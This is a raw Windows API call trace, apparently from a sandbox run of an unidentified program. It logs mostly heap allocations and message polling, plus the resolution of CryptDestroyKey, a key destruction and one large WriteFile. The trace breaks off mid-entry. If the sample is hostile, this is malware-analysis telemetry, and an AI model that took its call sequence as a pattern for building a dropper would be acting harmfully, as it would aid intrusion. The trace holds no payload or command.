HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0210.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0210.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0210.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0210.338] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0210.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0210.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0210.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0210.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0210.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0210.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0210.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0210.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0210.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0210.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0210.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0210.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0210.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0210.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0210.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0210.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0210.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0210.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0210.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0210.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0210.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5968) returned 0x2f3a5d8 [0210.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0210.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0210.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0210.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0210.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0210.341] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0210.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0210.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0210.341] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0210.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0210.341] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0210.341] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0210.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0210.341] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0210.341] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0210.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0210.341] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.342] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0210.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0210.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0210.342] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0210.342] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0210.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0210.342] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.342] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0210.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0210.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0210.345] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0210.345] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.345] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0210.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0210.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0210.346] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f29988*, nNumberOfBytesToWrite=0x5968, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f29988*, lpNumberOfBytesWritten=0x8cf5e4*=0x5968, lpOverlapped=0x0) returned 1 [0210.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0210.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0210.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0210.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0210.349] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0210.349] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0210.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0210.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0210.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0210.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0210.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0210.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0210.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0210.349] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.349] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0210.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0210.350] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0210.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0210.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e507b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0210.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0210.350] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0210.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0210.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0210.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0210.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0210.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.350] CryptDestroyKey (hKey=0xa87550) returned 1 [0210.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0210.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0210.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0210.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0210.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0210.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0210.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0210.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0210.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0210.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0210.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0210.352] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0210.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0210.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0210.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0210.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0210.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0210.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0210.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0210.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0210.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0210.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0210.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0210.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.353] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 